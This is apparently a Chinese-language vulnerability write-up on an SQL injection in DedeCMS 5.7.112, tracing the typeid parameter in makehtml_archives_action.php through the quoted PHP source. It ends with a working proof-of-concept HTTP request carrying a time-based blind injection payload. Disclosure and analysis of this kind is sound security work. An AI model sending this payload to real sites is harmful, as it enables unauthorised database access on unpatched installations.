DedeCMS(也称为织梦CMS)是一款基于PHP+MySQL的开源内容管理系统。
在 DedeCMS 5.7.112 中发现一个被归类为严重的漏洞。此漏洞会影响某些未知文件dede/makehtml_archives_action.php的处理。操作导致 sql 注入。攻击可能是远程发起的。该漏洞已向公众披露并可能被使用。.....
官方网站产品下载 / 织梦 (DedeCMS) 官方网站 - 内容管理系统 - 上海卓卓网络科技有限公司https://www.dedecms.com/
漏洞分析
文件makehtml_archives_action.php 中
查看传参
跟踪typeid的参数传递
if($typeid!=0) {
$ids = GetSonIds($typeid);
$gwhere .= " AND typeid in($ids) ";
跟入GetSonIds
/**
* 获得某id的所有下级id
*
* @param string $id 栏目id
* @param string $channel 模型ID
* @param string $addthis 是否包含本身
* @return string
*/
function GetSonIds($id,$channel=0,$addthis=true)
{
global $cfg_Cs;
$GLOBALS['idArray'] = array();
if( !is_array($cfg_Cs) )
{
require_once(DEDEDATA."/cache/inc_catalog_base.inc");
}
GetSonIdsLogic($id,$cfg_Cs,$channel,$addthis);
$rquery = join(',',$GLOBALS['idArray']);
$rquery = preg_replace("/,$/", '', $rquery);
return $rquery;
}
function GetSonIdsLogic($id,$sArr,$channel=0,$addthis=false)
{
if($id!=0 && $addthis)
{
$GLOBALS['idArray'][$id] = $id;
}
if(is_array($sArr))
{
foreach($sArr as $k=>$v)
{
if( $v[0]==$id && ($channel==0 || $v[1]==$channel ))
{
GetSonIdsLogic($k,$sArr,$channel,true);
}
}
}
}
typeid 成功返回到ids , $gwhere 欲成为sql语句
//统计记录总数
if($totalnum==0)
{
$row = $dsql->GetOne("SELECT COUNT(*) AS dd FROM `#@__arctiny` $idsql");
$totalnum = $row['dd'];
//清空缓存
$dsql->ExecuteNoneQuery("DELETE FROM `#@__arccache` ");
}
将IN
运算符与子查询结合使用 造成sql注入
漏洞复现
GET /DedeCMS-V5.7.112-UTF8/uploads/dede/makehtml_archives_action.php?typeid=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a) HTTP/1.1
Host: 127.0.0.1
sec-ch-ua: "Chromium";v="119", "Not?A_Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: menuitems=1_1%2C2_1%2C3_1; __test=1; SHIRO_SESSION_ID=ee08a13d-a890-43ed-93c3-4fb9de9fb6be; PHPSESSID=fdnnfrucnlv5sh8kqoir3tlnb3; _csrf_name_c61d67c3=60c09950514e6689f774acb4dd165493; _csrf_name_c61d67c31BH21ANI1AGD297L1FF21LN02BGE1DNG=781fb047d73ff07a; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=9585ea19d96a75fc; DedeLoginTime=1712461558; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=7eea594d91df28cb
Connection: close